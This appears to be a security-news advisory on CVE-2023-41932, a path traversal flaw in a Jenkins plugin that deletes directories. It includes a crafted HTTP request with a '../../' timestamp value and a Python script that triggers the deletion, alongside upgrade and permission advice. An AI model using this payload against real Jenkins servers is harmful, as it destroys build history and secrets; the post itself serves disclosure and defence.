CVE CyberSecurity Database News

CVE-2023-41932 - Exploiting the Jenkins Job Configuration History Plugin to Delete Arbitrary Directories

Poster -

The software development world relies heavily on automation tools like Jenkins. Many teams use plugins to extend Jenkins’ features. But sometimes, a plugin exposes a dangerous vulnerability. CVE-2023-41932 is a prime example: it lets an attacker delete specific directories on your Jenkins controller, potentially deleting important build history and even impacting build security. In this post, we’ll break down what happened, how the attack works, and what you need to do to protect yourself.

What is CVE-2023-41932?

This vulnerability affects the Job Configuration History plugin for Jenkins, up to version 1227.v7a_79fc4dc01f. The bug comes from how endpoints process the timestamp query parameter. When a user with at least ‘Job/Configure’ permission sends a specially crafted request, Jenkins can be tricked into deleting directories of the attacker's choosing—*as long as they contain a file called* history.xml.

The plugin does not check the input enough and lets malicious users reach outside intended file paths by using directory traversal tricks.

References

- Jenkins Security Advisory
- Original Issue Report (Jenkins Jira)
- NIST NVD Entry

How Does the Exploit Work?

At the heart of this bug is a series of endpoints handling deletion of job history records. These endpoints accept a timestamp query parameter, which is supposed to indicate which historic configuration should be deleted. The plugin doesn’t properly sanitize or validate this parameter—as a result, you can feed it path traversal values, like ../../path/to/evil, to tell Jenkins to delete directories *outside* the intended config history.

Example Exploit

Let’s say your Jenkins root is /var/jenkins_home. Maybe you have a directory you’d like to delete: /var/jenkins_home/secrets/stuff/ and it contains a file called history.xml.

A crafted HTTP request like this can cause the plugin to delete it

POST /job/YourJob/jobConfigHistory/delete?timestamp=../../secrets/stuff HTTP/1.1
Host: jenkins.example.com
Cookie: JSESSIONID=your-session-here
Content-Type: application/x-www-form-urlencoded
...

Here’s what happens

- timestamp=../../secrets/stuff tells the plugin to work with that specific directory

Plugin finds history.xml in there

- Plugin deletes the /var/jenkins_home/secrets/stuff directory and everything inside

Python Exploit Snippet

import requests

jenkins_url = 'https://jenkins.example.com';
job_name = 'YourJob'
malicious_path = '../../secrets/stuff'

# Must be logged in and have suitable cookies/headers
cookies = {'JSESSIONID': 'your-session-token'}
delete_url = f'{jenkins_url}/job/{job_name}/jobConfigHistory/delete?timestamp={malicious_path}'

# This will trigger the deletion if you have Job/Configure rights
resp = requests.post(delete_url, cookies=cookies, verify=False)
print(resp.status_code)

Note: You need a valid session or authentication.

Data Destruction: Build history, secrets, or important data inside directories are lost.

- Lateral Damage: If permissions are broad, attackers could systematically clear out configuration records across many jobs.
- Potential Chaining: Deleting history may make other vulnerabilities harder to audit or roll back.

Upgrade immediately: Install version 1229.v303947a_679b or later.

- Download latest version here
- Check user permissions: Limit ‘Job/Configure’ access to only trusted accounts.

Final Thoughts

CVE-2023-41932 is a textbook example of why input validation matters, especially when the input is used to access the file system. If you’re running Jenkins, especially with multiple users or automated agents, don’t delay in upgrading any affected plugins.

Keep an eye on your plugins, follow security advisories (Jenkins Security), and always use the *Principle of Least Privilege* to limit exposure.

Timeline

Published on: 09/06/2023 13:15:00 UTC
Last modified on: 09/11/2023 20:07:00 UTC